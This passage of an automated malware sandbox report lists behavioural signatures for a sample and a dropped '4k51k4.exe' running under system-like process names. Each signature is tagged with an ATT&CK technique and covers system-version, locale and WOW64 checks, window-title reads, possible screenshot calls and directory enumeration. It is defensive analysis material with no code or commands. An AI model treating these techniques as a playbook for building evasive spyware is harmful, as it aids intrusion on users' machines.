(UID: 00000000-00005932)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bb301d01bb3010016b3010000b001e414b301880000008800000017683b779817b301ff2b3b775da15e77a41bb301ac012c0000002c000000b001c06db00114009800ab040000c06db0015016b301100000000000000015009300ab040000c06db001 (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9475009931000080fd7f9a5c3c7700f0fd7f50c712004480fd7f00000000400000003f000000200000000080fd7f44c71200c15c3c7760824377200000000080fd7f9a5c3c7700f0fd7f68c7120057893b778083437713174975d8eb9475 (UID: 00000000-00003572)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21b3f01d01b3f0100163f0100003c01e4143f01880000008800000017683b7798173f01ff2b3b770aa45e77a41b3f01ac0130000000300000003c01c06d3c01140098001b040000c06d3c0150163f011000000000000000150093001b040000c06d3c01 (UID: 00000000-00002744)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21b5400d01b54000016540000005100e4145400880000008800000017683b7798175400ff2b3b77979e5e77a41b5400ac0161000000610000005100c06d510014009800ab040000c06d510050165400100000000000000015009300ab040000c06d5100 (UID: 00000000-00003560)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bda01d01bda010016da010000d701e414da01880000008800000017683b779817da01ff2b3b77dd905e77a41bda01ac012e0000002e000000d701c06dd70116008e00e1010000c06dd7015016da01100000000000000017008900e1010000c06dd701 (UID: 00000000-00003780)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21be201d01be2010016e2010000df01e414e201880000008800000017683b779817e201ff2b3b774f945e77a41be201ac011700000017000000df01c06ddf0116008e0024010000c06ddf015016e20110000000000000001700890024010000c06ddf01 (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb947558a41b000080fd7f9a5c3c7700f0fd7f50c712004480fd7f00000000400000003f0000001f0000000080fd7f44c71200c15c3c77608243771f0000000080fd7f9a5c3c7700f0fd7f68c7120057893b778083437713174975d8eb9475 (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bd601d01bd6010016d6010000d301e414d601880000008800000017683b779817d601ff2b3b773f8b5e77a41bd601ac015f0000005f000000d301c06dd30116008e001f000000c06dd3015016d6011000000000000000170089001f000000c06dd301 (UID: 00000000-00002660)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a00100005a1bfd01581bfd018815fd010000fa016c14fd01880000008800000017683b772017fd01ff2b3b779a8d5e772c1bfd01ac016200000062000000fa01905bfa011200a20019040000905bfa01d815fd01100000000000000013009d0019040000905bfa01 (UID: 00000000-00004456)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21b4600d01b46000016460000004300e4144600880000008800000017683b7798174600ff2b3b77378d5e77a41b4600ac015f0000005f0000004300c06d43001400980019040000c06d43005016460010000000000000001500930019040000c06d4300 (UID: 00000000-00003556)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bb701d01bb7010016b7010000b401e414b701880000008800000017683b779817b701ff2b3b7775865e77a41bb701ac012600000026000000b401c06db40116008e0068010000c06db4015016b70110000000000000001700890068010000c06db401 (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb947508b22a0000f0fd7f9a5c3c7700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15c3c77608243772000000000f0fd7f9a5c3c7700e0fd7f68c7120057893b778083437713174975d8eb9475 (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bdb01d01bdb010016db010000d801e414db01880000008800000017683b779817db01ff2b3b77e37e4177a41bdb01ac012e0000002e000000d801c06dd80116008e009c020000c06dd8015016db011000000000000000170089009c020000c06dd801 (UID: 00000000-00004404)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a00100005a1bd601581bd6018815d6010000d3016c14d601880000008800000017683b772017d601ff2b3b77717e41772c1bd601ac011900000019000000d301905bd3011200a20019040000905bd301d815d601100000000000000013009d0019040000905bd301 (UID: 00000000-00001200)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bdb01d01bdb010016db010000d801e414db01880000008800000017683b779817db01ff2b3b77b1764177a41bdb01ac012300000023000000d801c06dd80116008e00e3010000c06dd8015016db01100000000000000017008900e3010000c06dd801 (UID: 00000000-00002236)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004140)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005932)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003572)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002744)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003560)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003780)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002660)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004456)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003556)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e0054db1200b344376b05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce21200370a9f0110e0120010e012005ecbdd751401000000000000005ddb756ce212000e5ddb7504de1200dcaadf75010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d283ef01e4db12006d82db760c7a2f0004010000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000320066006600390034006600390037003500350035003500360032003300390061003700610065003800340038003800310034006300340030003800660061003500650038003200640034006100350038006300630063003500380031006500340033002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b3b77f3e15e77d8eb9475ac012b0000002b0000000000000000000000ffff87010000000000000000000000000000000000000100f70087010000000000000000000038702b0000000000200000000000000000000000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000310001000000ffffffff0200000008000000a8f72f00a8f72f00a3f72f000000000002000000b88f2d0000000000010000080000000054ed120095e137774b357700feffffffccda12003f08b77602000000b88f2d00000000000100001888fbb676bcda1200c81cdf7592dc120095fbb676f0db1200b88f2d0000000000000000000000000078db120000002b007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000e83ef0138db12006d82db760c7a2f0004010000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600268cef0150d412006d82db76cc79310004010000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00a4d01200b344376b0900000000000000000000000000000000000000000000000000000078010000000000000000000000000000bcd7120087009f0160d5120060d512005ecbdd757801000000000000005ddb75bcd712000e5ddb7554d31200dcaadf7501000000000000007a000000ffffffffffffffffdcd01200780200000000000025000000dcd012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000289ef0134d112006d82db76947f310004010000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003100003b000000002b0000000000a881310098d0120004643b7738012b00e0633b7702000000b88f2d0000000000010000084b357700feffffffbcc74377c0c743770a000000600f000000002b00807f3100f83b0000ff07000000002b00000000007f070000c4002b0008302b000c26000048d0120067e5387700002b00807f31000000000000002b00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007e88ef0188d012006d82db76947f310004010000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003100407f31003b7f3100000000000000000000002b0000000001d4cc12000000000038da120095e137774b357700feffffff435c3b7750593b77aa000000b80000003a7f3100387f31005cce120094d21200000000000000000000000000000000000000000000000000201a000000002b001c5c3a7760d84875ffffffff170000000cce12002400000003000000fcd2120028d8120094d212008600000038ce120096ed3b77627f3100a06a1175860000005cce120094d212000000000086008800a06a11755cce1200916c1175627f3100a06a1175a06a1175ccd2120002020000 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006024)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f015c801eea3a0720016c80102000000d0343300609ba0720c16c8017d9ba072328a9a72843e330097a8a0720200000000000000383e3300d03433000816c80194f9120094f912003ff29872f015c801c3a5a0720016c801d0343300c0e59672383e330034000000d01bc8010000c501e02fc801c0e59672d8f91200dcf91200000000004e0200009cfa1200340000003400000017683b77d81bc80100000000435c3b77becc5e770016c8012403c5010000c5015001c50193aba07200000000c06dc5015c15c80100000000d03433004e02000000fa12005001c501b7aba072 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000330054db1200b344376b05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce212002170fc0110e0120010e012005ecbdd751401000000000000005ddb756ce212000e5ddb7504de1200dcaadf75010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e2faac01e4db12006d82db765477340004010000 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005832)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"IsWow64Process\" with parameter \"6024\" - (UID: 00000000-00006024)\n \"4k51k4.exe\" called \"IsWow64Process\" with parameter \"5832\" - (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"4312\" - (UID: 00000000-00004312)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"4304\" - (UID: 00000000-00004304)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"3572\" - (UID: 00000000-00003572)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"2632\" - (UID: 00000000-00002632)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"4224\" - (UID: 00000000-00004224)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"4380\" - (UID: 00000000-00004380)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004140)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005932)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003572)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002744)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003560)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003780)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002660)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004456)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003556)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004404)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001200)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002236)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002044)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004380)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002644)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004396)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003856)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003588)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003660)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006024)\n \"4k51k4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004312)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"GetWindowTextA\" (UID: 00000000-00006024)\n \"4k51k4.exe\" called \"GetWindowTextA\" (UID: 00000000-00005832)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"906038619\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"906038619\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"906038619\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"906038619\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"906038619\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"906038619\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"906038619\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"3103853195\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter 4k51k4.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"4k51k4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters 